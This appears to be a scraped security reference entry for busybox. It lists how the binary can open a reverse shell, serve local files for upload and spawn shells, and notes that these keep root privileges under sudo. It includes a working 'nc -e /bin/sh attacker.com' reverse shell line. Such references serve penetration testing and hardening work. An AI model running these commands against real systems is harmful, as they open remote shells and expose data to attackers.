busybox
Reverse shell
This executable can send back a reverse system shell to a listening attacker.
- This function can be performed by any unprivileged user.
busybox nc -e /bin/sh attacker.com 12345This function is performed by the privileged user if executed viasudobecause the acquired privileges are not dropped.busybox nc -e /bin/sh attacker.com 12345
Upload
This executable can upload local data.
- This function can be performed by any unprivileged user.
busybox httpd -f -p 12345 -h .This function is performed by the privileged user if executed viasudobecause the acquired privileges are not dropped.busybox httpd -f -p 12345 -h .
Inherit
This executable can inherit functions from another.
- This function can be performed by any unprivileged user.
busybox ashThis function is performed by the privileged user if executed viasudobecause the acquired privileges are not dropped.busybox ash - This function can be performed by any unprivileged user.
busybox catThis function is performed by the privileged user if executed viasudobecause the acquired privileges are not dropped.busybox cat